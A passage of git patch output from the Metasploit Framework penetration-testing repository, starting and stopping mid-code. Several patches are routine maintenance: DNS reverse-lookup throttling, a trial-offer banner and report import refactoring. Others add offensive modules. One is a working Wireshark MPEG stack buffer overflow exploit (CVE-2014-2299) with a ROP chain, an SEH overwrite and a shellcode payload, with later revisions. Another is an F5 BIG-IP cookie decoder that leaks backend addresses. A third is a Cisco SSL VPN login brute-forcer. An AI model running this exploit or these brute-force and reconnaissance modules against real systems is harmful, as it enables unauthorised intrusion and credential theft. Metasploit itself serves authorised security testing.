"\x00" + # Session ID - "\x00\x2F" + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA) + cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA) "\x00" + # Compression Method (none) [extensions.length].pack('n') + extensions From d493c48cc6bafe23d9fdf0ad262e4facfe3a2add Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Sat, 12 Apr 2014 16:36:18 +0200 Subject: [PATCH 103/853] add thottling,notes insert and output to dns_rev_lookup --- .../auxiliary/gather/dns_reverse_lookup.rb | 46 ++++++++++++++++--- 1 file changed, 39 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index dc0b0167d2..aabf1c9bb1 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -12,26 +12,29 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Reverse Lookup Enumeration', - 'Description' => %q{ + 'Name' => 'DNS Reverse Lookup Enumeration', + 'Description' => %q{ This module performs DNS reverse lookup against a given IP range in order to retrieve valid addresses and names. }, - 'Author' => [ 'Carlos Perez ' ], - 'License' => BSD_LICENSE + 'Author' => [ 'Carlos Perez ', # Base code + 'Thanat0s '], # Output, Throttling & Db notes add + 'License' => BSD_LICENSE )) register_options( [ OptAddressRange.new('RANGE', [true, 'IP range to perform reverse lookup against.']), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]) + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]), + OptString.new('OUT_FILE', [ false, "Specify a CSV output file" ]) ], self.class) register_advanced_options( [ OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), - OptInt.new('THREADS', [ true, "The number of concurrent threads.", 1]) + OptInt.new('THREADS', [ true, "The number of concurrent threads.", 1]), + OptInt.new('THROTTLE', [ false, "Specify the resolution throttle in query per sec. 0 means unthrottled",0 ]) ], self.class) end @@ -55,21 +58,50 @@ class Metasploit3 < Msf::Auxiliary print_status("Running reverse lookup against IP range #{iprange}") ar = Rex::Socket::RangeWalker.new(iprange) tl = [] + # Basic Throttling + sleep_time = 0.0 + if (datastore['THROTTLE'] != 0) + sleep_time = (1.0/datastore['THROTTLE'])/datastore['THREADS'] + print_status("Throttle set to #{datastore['THROTTLE']} queries per seconds") + end + # Output.. + if datastore['OUT_FILE'] + print_status("Scan result saved in #{datastore['OUT_FILE']}") + open(datastore['OUT_FILE'], 'w') do |f| + f.puts "; IP, Host" + end + end while (true) # Spawn threads for each host while (tl.length <= @threadnum) ip = ar.next_ip + hosts = Array.new break if not ip tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip| begin + sleep(sleep_time) query = @res.query(tip) query.each_ptr do |addresstp| - print_status("Host Name: #{addresstp}, IP Address: #{tip.to_s}") + print_status("#Host Name: #{addresstp}, IP Address: #{tip.to_s}") + if datastore['OUT_FILE'] + open(datastore['OUT_FILE'], 'a') do |f| + f.puts "#{tip.to_s},#{addresstp}" + end + end report_host( :host => tip.to_s, :name => addresstp ) + hosts.push addresstp end + if !hosts.empty? + report_note( + :host => tip.to_s, + :type => "RDNS_Record", + :data => hosts + ) + end + hosts = Array.new rescue ::Interrupt raise $! rescue ::Rex::ConnectionError From dd7bceee56b23a71d376ebfd0c1dc00a557dca16 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Sat, 12 Apr 2014 17:43:39 +0200 Subject: [PATCH 104/853] fix threaded issues --- .../auxiliary/gather/dns_reverse_lookup.rb | 23 +++++++++++-------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index aabf1c9bb1..d8722ab01f 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary end while (true) # Spawn threads for each host + hosts = Hash.new while (tl.length <= @threadnum) ip = ar.next_ip - hosts = Array.new break if not ip tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip| begin @@ -92,16 +92,21 @@ class Metasploit3 < Msf::Auxiliary :host => tip.to_s, :name => addresstp ) - hosts.push addresstp + if !hosts[tip] + hosts[tip] = Array.new + end + hosts[tip].push addresstp end - if !hosts.empty? - report_note( - :host => tip.to_s, - :type => "RDNS_Record", - :data => hosts - ) + + if hosts[tip] + if !hosts[tip].empty? + report_note( + :host => tip.to_s, + :type => "RDNS_Record", + :data => hosts[tip] + ) + end end - hosts = Array.new rescue ::Interrupt raise $! rescue ::Rex::ConnectionError From da26a3963461aa9bf11f60ce10502299fe215680 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Mon, 14 Apr 2014 16:16:10 +0100 Subject: [PATCH 105/853] Add CVE-2014-2219 exploit for windows XP SP3 --- .../windows/misc/wireshark_mpeg_overflow.rb | 118 ++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/windows/misc/wireshark_mpeg_overflow.rb diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb new file mode 100644 index 0000000000..f26a6dd311 --- /dev/null +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -0,0 +1,118 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC', + 'Description' => %q{ + This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 + by sending an malicious packet.) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + ], + 'References' => + [ + [ 'CVE', '2014-2299'], + [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ], + [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ], + [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'BadChars' => "\xff\x00", + 'Space' => 600, + 'DisableNops' => 'True', + 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'WinXP SP3 Spanish (bypass DEP)', + { + 'OffSet' => 70692, + 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module + 'jmpesp' => 0x68e2bfb9, + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Mar 20 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']), + ], self.class) + end + + def junk + return rand_text(4).unpack("L")[0].to_i + end + def create_rop_chain() + + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x78b41ccb, # POP EAX # RETN [MSVCR100.dll] + 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] + 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll] + 0x68605980, # XCHG EAX,ESI # RETN [libglib-2.0-0.dll] + 0x64f94ba1, # POP EBP # RETN [libfontconfig-1.dll] + 0x63cd04f1, # & push esp # ret [liblzma-5.dll] + 0x6d4c331b, # POP EBX # RETN [libpangocairo-1.0-0.dll] + 0x00000201, # 0x00000201-> ebx + 0x78aa3bfb, # POP EDX # RETN [MSVCR100.dll] + 0x00000040, # 0x00000040-> edx + 0x78b29eda, # POP ECX # RETN [MSVCR100.dll] + 0x668242b9, # &Writable location [libgnutls-26.dll] + 0x70f67579, # POP EDI # RETN [libxml2-2.dll] + 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] + 0x6d5f8297, # POP EAX # RETN [libgio-2.0-0.dll] + 0x90909090, # nop + 0x6536979d, # PUSHAD # RETN [libpixman-1-0.dll] + ].flatten.pack("V*") + + return rop_gadgets + + end + + def exploit + + print_status("Creating '#{datastore['FILENAME']}' file ...") + magic_header = "\xff\xfb" # mpeg magic_number + packet = pattern_create(892) + ropchain = create_rop_chain + packet << ropchain + packet << payload.encoded # Shellcode + packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) + # SEH pointers overwrite (nseh & seh) + packet << "\x90\x90\x90\x90" # nseh + # 0xff is badchar then we can't make a jump back with jmp $-2000 + # After nseh and seh we haven't space, then we have to jump to another location. + # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA + packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN + print_status("Preparing payload") + filecontent = magic_header + filecontent << packet + print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes") + file_create(filecontent) + + end +end From e811e169dcf0bdb87900bfd2c0962f065b9a097a Mon Sep 17 00:00:00 2001 From: JoseMi Date: Mon, 14 Apr 2014 16:31:54 +0100 Subject: [PATCH 106/853] Cambios en el exploit --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index f26a6dd311..6ae406ef0c 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -16,11 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 - by sending an malicious packet.) + by generating an malicious file.) }, 'License' => MSF_LICENSE, 'Author' => [ + 'Wesley Neelen', # Discovery vulnerability 'j0sm1', # Exploit and msf module ], 'References' => From 2aecab89bbdafea44db2c10a7fa69968dab39dec Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 14 Apr 2014 11:00:41 -0500 Subject: [PATCH 107/853] 14-day free trial banner for non-binary installs --- lib/msf/ui/console/command_dispatcher/core.rb | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index fcd294fa6c..8237fd1682 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -406,6 +406,14 @@ class Core avdwarn = nil banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops ]\n" + + # Direct the user to the 14-day free trial of Metasploit Pro unless + # they are on an apt install or already using Metasploit Pro, + # Express, or Community edition + unless binary_install + banner << "+ -- --=[ 14-Day free trial: http://metasploit.pro ]" + end + if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate) tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d") banner << " =[ svn r#{::Msf::Framework::RepoRevision} updated #{::Msf::Framework::RepoUpdatedDaysNote} (#{tstamp})\n" @@ -3040,6 +3048,18 @@ class Core File.exists?(File.expand_path(File.join(msfbase_dir, '.apt'))) end + # Determines if we're a Metasploit Pro/Community/Express + # installation or a tarball/git checkout + # + # @return [Boolean] true if we are a binary install + def binary_install + binary_paths = [ + 'C:/metasploit/apps/pro/msf3', + '/opt/metasploit/apps/pro/msf3' + ] + return binary_paths.include? Msf::Config.install_root + end + # # Module list enumeration # From 176204d62d77838234c12a23de03bf5294bd6e7a Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 14 Apr 2014 21:11:04 +0200 Subject: [PATCH 108/853] With implemented remarks --- .../auxiliary/gather/dns_reverse_lookup.rb | 29 +++++++++---------- 1 file changed, 13 insertions(+), 16 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index d8722ab01f..129da312d8 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -17,8 +17,8 @@ class Metasploit3 < Msf::Auxiliary This module performs DNS reverse lookup against a given IP range in order to retrieve valid addresses and names. }, - 'Author' => [ 'Carlos Perez ', # Base code - 'Thanat0s '], # Output, Throttling & Db notes add + 'Author' => [ 'Carlos Perez ', # Base code + 'Thanat0s '], # Output, Throttling & Db notes add 'License' => BSD_LICENSE )) @@ -58,11 +58,11 @@ class Metasploit3 < Msf::Auxiliary print_status("Running reverse lookup against IP range #{iprange}") ar = Rex::Socket::RangeWalker.new(iprange) tl = [] - # Basic Throttling + # Basic Throttling sleep_time = 0.0 if (datastore['THROTTLE'] != 0) sleep_time = (1.0/datastore['THROTTLE'])/datastore['THREADS'] - print_status("Throttle set to #{datastore['THROTTLE']} queries per seconds") + print_status("Throttle set to #{datastore['THROTTLE']} queries per seconds") end # Output.. if datastore['OUT_FILE'] @@ -79,10 +79,10 @@ class Metasploit3 < Msf::Auxiliary break if not ip tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip| begin - sleep(sleep_time) + Rex.sleep(sleep_time) query = @res.query(tip) query.each_ptr do |addresstp| - print_status("#Host Name: #{addresstp}, IP Address: #{tip.to_s}") + print_status("Host Name: #{addresstp}, IP Address: #{tip.to_s}") if datastore['OUT_FILE'] open(datastore['OUT_FILE'], 'a') do |f| f.puts "#{tip.to_s},#{addresstp}" @@ -92,20 +92,17 @@ class Metasploit3 < Msf::Auxiliary :host => tip.to_s, :name => addresstp ) - if !hosts[tip] + if !hosts[tip] hosts[tip] = Array.new end hosts[tip].push addresstp end - - if hosts[tip] - if !hosts[tip].empty? - report_note( - :host => tip.to_s, - :type => "RDNS_Record", - :data => hosts[tip] - ) - end + unless hosts[tip].nil? or hosts[tip].empty? + report_note( + :host => tip.to_s, + :type => "RDNS_Record", + :data => hosts[tip] + ) end rescue ::Interrupt raise $! From fecdbd1781b370e7b476e465372194d3d0552ac8 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Tue, 15 Apr 2014 01:11:17 +0200 Subject: [PATCH 109/853] F5 bigip cookie module --- .../http/f5_bigip_cookie_disclosure.rb | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb new file mode 100644 index 0000000000..92fc28011c --- /dev/null +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -0,0 +1,86 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'F5 Bigip Backend IP/PORT Cookie Disclosure.', + 'Description' => %q{ + This module attempts to identify F5 SLB and decode sticky cookies wich leak + backend IP and port. + }, + 'Author' => [ 'Thanat0s' ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to test', '/']), + OptInt.new('RETRY', [true, 'Number of requests to find backends', 10]) + ], self.class) + end + + def cookie_decode(cookie_value) + m = cookie_value.match(/(\d+)\.(\d+)\./) + host = (m.nil?) ? nil : m[1] + port = (m.nil?) ? nil : m[2] + port = (("%04X" % port).slice(2,4) << ("%04X" % port).slice(0,2)).hex.to_s + byte1 = ("%08X" % host).slice(6..7).hex.to_s + byte2 = ("%08X" % host).slice(4..5).hex.to_s + byte3 = ("%08X" % host).slice(2..3).hex.to_s + byte4 = ("%08X" % host).slice(0..1).hex.to_s + host = byte1 << "." << byte2 << "." << byte3 << "." << byte4 + return host,port + end + + def get_cook + res = send_request_raw({ + 'method' => 'GET', + 'uri' => @uri + }) + + #puts res.get_cookies + begin + # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" + m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + # m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + ensure + id = (m.nil?) ? nil : m[1] + value = (m.nil?) ? nil : m[2] + return id, value + end + end + + def run + host_port = Hash.new + @uri = normalize_uri(target_uri.path) + print_status("Starting request #{@uri}") + id, value = get_cook() + if id + print_status "F5 cookie \"#{id}\" found" + host, port = cookie_decode(value) + host_port[host+":"+port] = true + print_status "Backend #{host}:#{port}" + i=1 # We already have done one request + until i == datastore['RETRY'] + id, value = get_cook() + host, port = cookie_decode(value) + unless ! host_port[host+":"+port].nil? + host_port[host+":"+port] = true + print_status "Backend #{host}:#{port}" + end + i += 1 + end + else + print_error "F5 SLB cookie not found" + end + end +end From 07ed8d832a3bd5e1fe4b415df466fd224d170215 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Tue, 15 Apr 2014 02:48:55 +0200 Subject: [PATCH 110/853] Update db --- .../http/f5_bigip_cookie_disclosure.rb | 27 ++++++++++++++----- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index 92fc28011c..9ac2c2e550 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -14,17 +14,22 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'F5 Bigip Backend IP/PORT Cookie Disclosure.', 'Description' => %q{ - This module attempts to identify F5 SLB and decode sticky cookies wich leak + This module identify F5 BigIP SLB and decode sticky cookies wich leak backend IP and port. }, - 'Author' => [ 'Thanat0s' ], + 'Author' => [ 'Thanat0s ' ], + 'References' => + [ + ['URL', 'http://support.f5.com/kb/en-us/solutions/public/6000/900/sol6917.html'], + ['URL', 'http://support.f5.com/kb/en-us/solutions/public/7000/700/sol7784.html?sr=14607726'] + ], 'License' => MSF_LICENSE )) register_options( [ OptString.new('TARGETURI', [true, 'The URI path to test', '/']), - OptInt.new('RETRY', [true, 'Number of requests to find backends', 10]) + OptInt.new('RETRY', [true, 'Number of requests to try to find backends', 10]) ], self.class) end @@ -41,17 +46,15 @@ class Metasploit3 < Msf::Auxiliary return host,port end - def get_cook + def get_cook # request a page and exctract a F5 looking cookie. res = send_request_raw({ 'method' => 'GET', 'uri' => @uri }) - #puts res.get_cookies begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - # m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) ensure id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] @@ -73,12 +76,22 @@ class Metasploit3 < Msf::Auxiliary until i == datastore['RETRY'] id, value = get_cook() host, port = cookie_decode(value) - unless ! host_port[host+":"+port].nil? + if ! host_port.has_key? host+":"+port host_port[host+":"+port] = true print_status "Backend #{host}:#{port}" end i += 1 end + # Reporting found backend in database + backends = Array.new + host_port.each do |key, value| + backends.push key + end + report_note( + :host => datastore['RHOST'], + :type => "F5_Cookie_Backends", + :data => backends + ) else print_error "F5 SLB cookie not found" end From 2ed7a739c3361063632442fc39add91227c2b1a2 Mon Sep 17 00:00:00 2001 From: Samuel Huckins Date: Wed, 16 Apr 2014 15:15:47 -0500 Subject: [PATCH 111/853] New reports in new exports can now import MSP-9783 * Extracted import_report from monstrous import_msf_collateral; simplified and clarified approach * Updated report_report: includes all attrs provided vs subset, provides more helpful error message * Added report_artifact: adds child artifact for reports, handles various troublesome cases * Tested on all report types with a legion of option variants --- lib/msf/core/db.rb | 144 +++++++++++++++++++++++++++++---------------- 1 file changed, 92 insertions(+), 52 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index c74b205f0b..bbe8b7f790 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -2172,35 +2172,63 @@ class DBManager end - # - # Find or create a task matching this type/data - # + # TODO This method does not attempt to find. It just creates + # a report based on the passed params. def find_or_create_report(opts) report_report(opts) end + # Creates a Report based on passed parameters. Does not handle + # child artifacts. + # @param opts [Hash] + # @return [Integer] ID of created report def report_report(opts) return if not active ::ActiveRecord::Base.connection_pool.with_connection { - wspace = opts.delete(:workspace) || workspace - path = opts.delete(:path) || (raise RuntimeError, "A report :path is required") - ret = {} - user = opts.delete(:user) - options = opts.delete(:options) - rtype = opts.delete(:rtype) - report = wspace.reports.new - report.created_by = user - report.options = options - report.rtype = rtype - report.path = path - msf_import_timestamps(opts,report) - report.save! + report = Report.new(opts) + unless report.valid? + errors = report.errors.full_messages.join('; ') + raise RuntimeError "Report to be imported is not valid: #{errors}" + end + report.state = :complete # Presume complete since it was exported + report.save - ret[:task] = report + report.id } end + # Creates a ReportArtifact based on passed parameters. + # @param opts [Hash] of ReportArtifact attributes + def report_artifact(opts) + artifacts_dir = Report::ARTIFACT_DIR + tmp_path = opts[:file_path] + artifact_name = File.basename tmp_path + new_path = File.join(artifacts_dir, artifact_name) + + unless File.exists? tmp_path + raise DBImportError 'Report artifact file to be imported does not exist.' + end + + unless (File.directory?(artifacts_dir) && File.writable?(artifacts_dir)) + raise DBImportError "Could not move report artifact file to #{artifacts_dir}." + end + + if File.exists? new_path + unique_basename = "#{(Time.now.to_f*1000).to_i}_#{artifact_name}" + new_path = File.join(artifacts_dir, unique_basename) + end + + FileUtils.copy(tmp_path, new_path) + opts[:file_path] = new_path + artifact = ReportArtifact.new(opts) + unless artifact.valid? + errors = artifact.errors.full_messages.join('; ') + raise RuntimeError "Artifact to be imported is not valid: #{errors}" + end + artifact.save + end + # # This methods returns a list of all reports in the database # @@ -3793,43 +3821,55 @@ class DBManager # Import Reports doc.elements.each("/#{btag}/reports/report") do |report| - tmp = args[:ifd][:zip_tmp] - report_info = {} - report_info[:workspace] = args[:wspace] - # Should user be imported (original) or declared (the importing user)? - report_info[:user] = nils_for_nulls(report.elements["created-by"].text.to_s.strip) - report_info[:options] = nils_for_nulls(report.elements["options"].text.to_s.strip) - report_info[:rtype] = nils_for_nulls(report.elements["rtype"].text.to_s.strip) - report_info[:created_at] = nils_for_nulls(report.elements["created-at"].text.to_s.strip) - report_info[:updated_at] = nils_for_nulls(report.elements["updated-at"].text.to_s.strip) - report_info[:orig_path] = nils_for_nulls(report.elements["path"].text.to_s.strip) - report_info[:task] = args[:task] - report_info[:orig_path].gsub!(/^\./, tmp) if report_info[:orig_path] - - # Only report a report if we actually have it. - # TODO: Copypasta. Seperate this out. - if ::File.exists? report_info[:orig_path] - reports_dir = ::File.join(basedir,"reports") - report_file = ::File.split(report_info[:orig_path]).last - if ::File.exists? reports_dir - unless (::File.directory?(reports_dir) && ::File.writable?(reports_dir)) - raise DBImportError.new("Could not move files to #{reports_dir}") - end - else - ::FileUtils.mkdir_p(reports_dir) - end - new_report = ::File.join(reports_dir,report_file) - report_info[:path] = new_report - if ::File.exists?(new_report) - ::File.unlink new_report - else - report_report(report_info) - end - ::FileUtils.copy(report_info[:orig_path], new_report) - yield(:msf_report, new_report) if block - end + import_report(report, args, basedir) end + end + # @param report [REXML::Element] to be imported + # @param args [Hash] + # @param base_dir [String] + def import_report(report, args, base_dir) + tmp = args[:ifd][:zip_tmp] + report_info = {} + + report.elements.each do |e| + node_name = e.name + node_value = e.text + + # These need to be converted back to arrays: + array_attrs = %w|addresses file-formats options sections| + if array_attrs.member? node_name + node_value = JSON.parse(node_value) + end + # Don't restore these values: + skip_nodes = %w|id workspace-id artifacts| + next if skip_nodes.member? node_name + + report_info[node_name.parameterize.underscore.to_sym] = node_value + end + # Use current workspace + report_info[:workspace_id] = args[:wspace].id + + # Create report, need new ID to record artifacts + report_id = report_report(report_info) + + # Handle artifacts + report.elements['artifacts'].elements.each do |artifact| + artifact_opts = {} + artifact.elements.each do |attr| + skip_nodes = %w|id accessed-at| + next if skip_nodes.member? attr.name + + symboled_attr = attr.name.parameterize.underscore.to_sym + artifact_opts[symboled_attr] = attr.text + end + # Use new Report as parent + artifact_opts[:report_id] = report_id + # Update to full path + artifact_opts[:file_path].gsub!(/^\./, tmp) + + report_artifact(artifact_opts) + end end # Convert the string "NULL" to actual nil From f53e7f84b88c9912aa3a90682f4211cdea4f2795 Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Wed, 16 Apr 2014 22:47:58 -0400 Subject: [PATCH 112/853] Adds Cisco SSL VPN Bruteforce Aux Mod --- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 193 ++++++++++++++++++ 1 file changed, 193 insertions(+) create mode 100644 modules/auxiliary/scanner/http/cisco_ssl_vpn.rb diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb new file mode 100644 index 0000000000..bbd349df0f --- /dev/null +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -0,0 +1,193 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex/proto/http' +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Cisco SSL VPN Bruteforce Login Utility', + 'Description' => %{ + This module scans for Cisco SSL VPN web login portals and + performs login brute force to identify valid credentials. + }, + 'Author' => + [ + 'Jonathan Claudius ', + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]), + OptString.new('USERNAME', [true, "A specific username to authenticate as", 'cisco']), + OptString.new('PASSWORD', [true, "A specific password to authenticate with", 'cisco']), + OptString.new('GROUP', [false, "A specific VPN group to use", '']) + ], self.class) + end + + def run_host(ip) + unless check_conn? + print_error("#{peer} - Connection failed, Aborting...") + return + end + + unless is_app_ssl_vpn? + print_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") + return + end + + print_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") + + groups = Set.new + if datastore['GROUP'].empty? + print_status("#{peer} - Attempt to Enumerate VPN Groups...") + groups = enumerate_vpn_groups + print_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") unless groups.empty? + else + groups << datastore['GROUP'] + end + groups << "" + + print_status("#{peer} - Starting login brute force...") + groups.each do |group| + each_user_pass do |user, pass| + do_login(user, pass, group) + end + end + end + + # Verify whether the connection is working or not + def check_conn? + begin + res = send_request_cgi( + { + 'uri' => '/', + 'method' => 'GET' + }) + print_good("#{peer} - Server is responsive...") + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + return + end + end + + def enumerate_vpn_groups + res = send_request_cgi({ + 'uri' => '/+CSCOE+/logon.html', + 'method' => 'GET', + }) + + groups = Set.new + group_name_regex = / 0x68e2bfb9, } ], @@ -66,28 +66,29 @@ class Metasploit3 < Msf::Exploit::Remote def junk return rand_text(4).unpack("L")[0].to_i end + def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ - 0x78b41ccb, # POP EAX # RETN [MSVCR100.dll] + 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] - 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll] - 0x68605980, # XCHG EAX,ESI # RETN [libglib-2.0-0.dll] - 0x64f94ba1, # POP EBP # RETN [libfontconfig-1.dll] - 0x63cd04f1, # & push esp # ret [liblzma-5.dll] - 0x6d4c331b, # POP EBX # RETN [libpangocairo-1.0-0.dll] + 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x00000201, # 0x00000201-> ebx - 0x78aa3bfb, # POP EDX # RETN [MSVCR100.dll] + 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] 0x00000040, # 0x00000040-> edx - 0x78b29eda, # POP ECX # RETN [MSVCR100.dll] + 0x6197660f, # POP ECX # RETN 